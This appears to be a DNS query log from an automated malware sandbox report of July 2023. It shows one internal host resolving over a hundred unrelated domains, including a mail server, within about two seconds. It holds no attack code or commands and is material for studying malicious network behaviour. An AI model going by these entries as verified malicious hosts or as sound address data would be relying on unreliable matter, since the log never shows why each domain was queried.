                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.854794979 CEST8.8.8.8192.168.2.40xd709Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.926619053 CEST8.8.8.8192.168.2.40x5cd3No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.929456949 CEST8.8.8.8192.168.2.40xf44dNo error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.937108994 CEST8.8.8.8192.168.2.40xa827No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.947823048 CEST8.8.8.8192.168.2.40xf2d4No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.960210085 CEST8.8.8.8192.168.2.40x9827No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.961184978 CEST8.8.8.8192.168.2.40x74No error (0)oh28ya.com54.248.249.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.961184978 CEST8.8.8.8192.168.2.40x74No error (0)oh28ya.com54.95.64.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.993339062 CEST8.8.8.8192.168.2.40x7a5aNo error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.004801035 CEST8.8.8.8192.168.2.40x7361No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.008747101 CEST8.8.8.8192.168.2.40x4002No error (0)araax.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.008747101 CEST8.8.8.8192.168.2.40x4002No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.008747101 CEST8.8.8.8192.168.2.40x4002No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.008747101 CEST8.8.8.8192.168.2.40x4002No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.013480902 CEST8.8.8.8192.168.2.40x6bc1No error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.042985916 CEST8.8.8.8192.168.2.40xbedcNo error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.050056934 CEST8.8.8.8192.168.2.40x563Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.064964056 CEST8.8.8.8192.168.2.40xa7dcName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.078746080 CEST8.8.8.8192.168.2.40x3f5eNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.101054907 CEST8.8.8.8192.168.2.40xe4dcNo error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.101054907 CEST8.8.8.8192.168.2.40xe4dcNo error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.101054907 CEST8.8.8.8192.168.2.40xe4dcNo error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.115647078 CEST8.8.8.8192.168.2.40x72beNo error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.128809929 CEST8.8.8.8192.168.2.40x7c3dNo error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.145015001 CEST8.8.8.8192.168.2.40x679No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.149000883 CEST8.8.8.8192.168.2.40xaaa3Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.166449070 CEST8.8.8.8192.168.2.40xf00No error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.168961048 CEST8.8.8.8192.168.2.40xd7fdName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.174582005 CEST8.8.8.8192.168.2.40x4d87Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.176162004 CEST8.8.8.8192.168.2.40x4d5fName error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.176213980 CEST8.8.8.8192.168.2.40xf8c4No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.176944017 CEST8.8.8.8192.168.2.40xd85aNo error (0)rkengg.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.176944017 CEST8.8.8.8192.168.2.40xd85aNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.176944017 CEST8.8.8.8192.168.2.40xd85aNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.176944017 CEST8.8.8.8192.168.2.40xd85aNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.178497076 CEST8.8.8.8192.168.2.40xba7dNo error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.187489986 CEST8.8.8.8192.168.2.40x9237No error (0)geecl.com194.76.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.201657057 CEST8.8.8.8192.168.2.40x1de3No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.210764885 CEST8.8.8.8192.168.2.40x207bName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.211244106 CEST8.8.8.8192.168.2.40x92beName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.220386028 CEST8.8.8.8192.168.2.40x4234Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.246936083 CEST8.8.8.8192.168.2.40x2b76No error (0)anduran.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.246936083 CEST8.8.8.8192.168.2.40x2b76No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.246936083 CEST8.8.8.8192.168.2.40x2b76No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.246936083 CEST8.8.8.8192.168.2.40x2b76No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.248110056 CEST8.8.8.8192.168.2.40x8c70No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.253176928 CEST8.8.8.8192.168.2.40x72a7No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.334497929 CEST8.8.8.8192.168.2.40x419bNo error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.405936956 CEST8.8.8.8192.168.2.40x886fName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.409635067 CEST8.8.8.8192.168.2.40xaef1No error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.409635067 CEST8.8.8.8192.168.2.40xaef1No error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.412365913 CEST8.8.8.8192.168.2.40xa92fName error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.495758057 CEST8.8.8.8192.168.2.40x66aNo error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.511070967 CEST8.8.8.8192.168.2.40x767dServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.513710976 CEST8.8.8.8192.168.2.40x51f3No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.526469946 CEST8.8.8.8192.168.2.40x464dNo error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.577609062 CEST8.8.8.8192.168.2.40x5b25No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.584834099 CEST8.8.8.8192.168.2.40x62a7No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.586191893 CEST8.8.8.8192.168.2.40xb5a1No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.586191893 CEST8.8.8.8192.168.2.40xb5a1No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.589093924 CEST8.8.8.8192.168.2.40xc046Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.595166922 CEST8.8.8.8192.168.2.40xa5dNo error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.596359015 CEST8.8.8.8192.168.2.40xc1d8No error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.596359015 CEST8.8.8.8192.168.2.40xc1d8No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.596359015 CEST8.8.8.8192.168.2.40xc1d8No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.596359015 CEST8.8.8.8192.168.2.40xc1d8No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.615997076 CEST8.8.8.8192.168.2.40xdb29No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.648782969 CEST8.8.8.8192.168.2.40x3c0fNo error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.649204969 CEST8.8.8.8192.168.2.40x8e15No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.655628920 CEST8.8.8.8192.168.2.40xe2b7No error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.672482967 CEST8.8.8.8192.168.2.40x7395Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.718291044 CEST8.8.8.8192.168.2.40x88f1No error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.733925104 CEST8.8.8.8192.168.2.40x831cNo error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.740365982 CEST8.8.8.8192.168.2.40xe625Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.769612074 CEST8.8.8.8192.168.2.40x8c66No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.769612074 CEST8.8.8.8192.168.2.40x8c66No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.769612074 CEST8.8.8.8192.168.2.40x8c66No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.778229952 CEST8.8.8.8192.168.2.40xec54No error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.797565937 CEST8.8.8.8192.168.2.40x8129No error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.825700998 CEST8.8.8.8192.168.2.40x1ec2Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.836416006 CEST8.8.8.8192.168.2.40x9372No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.838393927 CEST8.8.8.8192.168.2.40x7da0No error (0)x96.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.838393927 CEST8.8.8.8192.168.2.40x7da0No error (0)x96.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.849634886 CEST8.8.8.8192.168.2.40xfbc8No error (0)x96.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.849634886 CEST8.8.8.8192.168.2.40xfbc8No error (0)x96.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.850608110 CEST8.8.8.8192.168.2.40x9372No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.897077084 CEST8.8.8.8192.168.2.40xc0e8No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.913852930 CEST8.8.8.8192.168.2.40x20fdNo error (0)www.tc17.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.913852930 CEST8.8.8.8192.168.2.40x20fdNo error (0)www.tc17.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.925111055 CEST8.8.8.8192.168.2.40x2759No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.929605961 CEST8.8.8.8192.168.2.40x6e72Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.933954000 CEST8.8.8.8192.168.2.40xa67dNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.934298038 CEST8.8.8.8192.168.2.40x3cdbNo error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.940402985 CEST8.8.8.8192.168.2.40xdd01Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.955487967 CEST8.8.8.8192.168.2.40x816eNo error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.970875025 CEST8.8.8.8192.168.2.40x1850No error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.011159897 CEST8.8.8.8192.168.2.40x679aName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.041438103 CEST8.8.8.8192.168.2.40x7317No error (0)k-nikko.com52.199.213.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.041438103 CEST8.8.8.8192.168.2.40x7317No error (0)k-nikko.com54.150.159.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.074918032 CEST8.8.8.8192.168.2.40x596dName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.095422029 CEST8.8.8.8192.168.2.40x1273No error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.096507072 CEST8.8.8.8192.168.2.40xd585No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.101638079 CEST8.8.8.8192.168.2.40x1bc8No error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.119210958 CEST8.8.8.8192.168.2.40x9db0Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.121557951 CEST8.8.8.8192.168.2.40x105No error (0)hyab.se188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.121557951 CEST8.8.8.8192.168.2.40x105No error (0)hyab.se188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.137648106 CEST8.8.8.8192.168.2.40x94d0No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.145178080 CEST8.8.8.8192.168.2.40xb61eServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.150175095 CEST8.8.8.8192.168.2.40xec80No error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.177371979 CEST8.8.8.8192.168.2.40x8b82Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.219630003 CEST8.8.8.8192.168.2.40x4e97Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.247735023 CEST8.8.8.8192.168.2.40xf8aaNo error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.278811932 CEST8.8.8.8192.168.2.40x7b1cNo error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.410182953 CEST8.8.8.8192.168.2.40x7d69No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.424798965 CEST8.8.8.8192.168.2.40x70bcNo error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.434612036 CEST8.8.8.8192.168.2.40x94c3No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.434612036 CEST8.8.8.8192.168.2.40x94c3No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.434612036 CEST8.8.8.8192.168.2.40x94c3No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.465953112 CEST8.8.8.8192.168.2.40xdbebNo error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.473594904 CEST8.8.8.8192.168.2.40x79beNo error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.485764980 CEST8.8.8.8192.168.2.40xdd28No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.494921923 CEST8.8.8.8192.168.2.40xcfb7No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.537671089 CEST8.8.8.8192.168.2.40x15f7No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.540972948 CEST8.8.8.8192.168.2.40x47b8No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.540972948 CEST8.8.8.8192.168.2.40x47b8No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.550582886 CEST8.8.8.8192.168.2.40x2be1No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.550582886 CEST8.8.8.8192.168.2.40x2be1No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.573034048 CEST8.8.8.8192.168.2.40xe354No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.580209017 CEST8.8.8.8192.168.2.40x1605No error (0)araax.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.580209017 CEST8.8.8.8192.168.2.40x1605No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.580209017 CEST8.8.8.8192.168.2.40x1605No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.580209017 CEST8.8.8.8192.168.2.40x1605No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.584533930 CEST8.8.8.8192.168.2.40xf1b9No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.619080067 CEST8.8.8.8192.168.2.40xf726No error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.619080067 CEST8.8.8.8192.168.2.40xf726No error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.620244980 CEST8.8.8.8192.168.2.40x861eNo error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.620244980 CEST8.8.8.8192.168.2.40x861eNo error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.624674082 CEST8.8.8.8192.168.2.40xa7cfNo error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.632035017 CEST8.8.8.8192.168.2.40xb749No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.640718937 CEST8.8.8.8192.168.2.40xb78aNo error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.642682076 CEST8.8.8.8192.168.2.40x8aadNo error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.650105953 CEST8.8.8.8192.168.2.40xee19No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.670828104 CEST8.8.8.8192.168.2.40x1be7No error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.670828104 CEST8.8.8.8192.168.2.40x1be7No error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.681890011 CEST8.8.8.8192.168.2.40x85e4No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.693047047 CEST8.8.8.8192.168.2.40x8726Name error (3)ascc.org.aunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.751270056 CEST8.8.8.8192.168.2.40xc3f4No error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.751270056 CEST8.8.8.8192.168.2.40xc3f4No error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.803025961 CEST8.8.8.8192.168.2.40xd691No error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.805305004 CEST8.8.8.8192.168.2.40xb8e9Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.863797903 CEST8.8.8.8192.168.2.40x29acServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.864082098 CEST8.8.8.8192.168.2.40x391No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.880657911 CEST8.8.8.8192.168.2.40x3251No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.886960030 CEST8.8.8.8192.168.2.40xf8c8No error (0)dyag-eng.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.886960030 CEST8.8.8.8192.168.2.40xf8c8No error (0)dyag-eng.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.891829014 CEST8.8.8.8192.168.2.40x79e9No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.892453909 CEST8.8.8.8192.168.2.40x8a08No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.904933929 CEST8.8.8.8192.168.2.40xacccServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
